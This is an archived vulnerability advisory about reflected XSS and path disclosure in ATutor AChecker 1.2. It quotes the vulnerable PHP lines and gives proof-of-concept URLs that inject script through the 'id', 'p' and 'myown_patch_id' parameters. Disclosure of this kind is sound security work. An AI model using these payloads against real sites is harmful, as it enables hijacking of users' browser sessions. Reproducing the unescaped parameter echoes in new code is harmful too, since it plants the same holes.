ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure: Posted Aug 6, 2011; Authored by LiquidWorm | Site zeroscience.mk; ATutor AChecker version 1.2 suffers from cross site scripting and path disclosure vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | f051fdf159320c7c589e285d8b88bea2bf95dbf5dda51944394344650d558b95; Download | Favorite | View

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure


AChecker 1.2 Multiple Remote XSS/PD Vulnerabilities


Vendor: ATutor (Inclusive Design Institute)
Product web page: https://www.atutor.ca
Affected version: 1.2 (build r530)

Summary: AChecker is an open source Web accessibility evaluation tool.
It can be used to review the accessibility of Web pages based on a variety
international accessibility guidelines.

Desc: AChecker suffers from multiple cross-site scripting and path disclosure
vulnerabilities. Input thru the GET parameters 'id', 'p' and 'myown_patch_id'
in several scripts is not sanitized allowing the attacker to execute HTML code
into user's browser session on the affected site and/or disclose the full path
of application's residence ;].


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: id
- Type: GET
- Script: language_add_edit.tmpl.php
- Vulnerable code:
----------------------------------------------------
/themes/default/language/language_add_edit.tmpl.php:
----------------------------------------------------

Line 20: <form name="input_form" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?><?php if (isset($_GET["id"])) echo '?id='.$_GET["id"]; ?>" >

----------------------------------------------------

- PoC: https://localhost/themes/default/language/language_add_edit.tmpl.php?id=210"><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: p
- Type: GET
- Script: frame_header.php
- Vulnerable code:
----------------------------------------------------
/documentation/frame_header.php:
----------------------------------------------------

Line 17: if (isset($_GET['p'])) {
Line 18:         $this_page = htmlentities($_GET['p']);
Line 19: } else {
Line 20:         exit;
Line 21: }

----------------------------------------------------

- PoC: https://localhost/documentation/frame_header.php?p="><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: id
- Type: GET
- Script: user_group_create_edit.tmpl.php
- Vulnerable code:
----------------------------------------------------
/themes/default/user/user_group_create_edit.tmpl.php:
----------------------------------------------------

Line 20: <form name="input_form" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?><?php if (isset($_GET["id"])) echo '?id='.$_GET["id"]; ?>" >

----------------------------------------------------

- PoC: https://localhost/themes/default/user/user_group_create_edit.tmpl.php?id=188"><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: myown_patch_id
- Type: GET
- Script: patch_edit.php
- Vulnerable code:
----------------------------------------------------
/updater/patch_edit.php:
----------------------------------------------------

Line 20: if (!isset($_REQUEST["myown_patch_id"]))
Line 21: {
Line 22:         $msg->addError('NO_ITEM_SELECTED');
Line 23:         exit;
Line 24: }
Line 25: 
Line 26: $myown_patch_id = $_REQUEST["myown_patch_id"];

----------------------------------------------------

- PoC: https://localhost/updater/patch_edit.php?lang=144&myown_patch_id=144"><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: id
- Type: GET
- Script: user_create_edit.php
- Vulnerable code:
----------------------------------------------------
/user/user_create_edit.php:
----------------------------------------------------

Line 103: if (isset($_GET['id'])) // edit existing user
Line 104: {
Line 105:         $usersDAO = new UsersDAO();
Line 106:         $savant->assign('user_row', $usersDAO->getUserByID($_GET['id']));
Line 107:         $savant->assign('show_password', false);
Line 108: 
Line 109: }

----------------------------------------------------

- PoC: https://localhost/user/user_create_edit.php?id=78"><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              liquidworm gmail com
                              Zero Science Lab - https://www.zeroscience.mk


Advisory ID: ZSL-2011-5035
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5035.php


01.08.2011


t00t!

Top Authors In Last 30 Days

Red Hat 294 files
Ubuntu 64 files
Debian 24 files
Apple 14 files
LiquidWorm 12 files
Gentoo 8 files
Google Security Research 4 files
Andrey Stoykov 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,171)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,070)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,426)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,010)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure

Share This

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems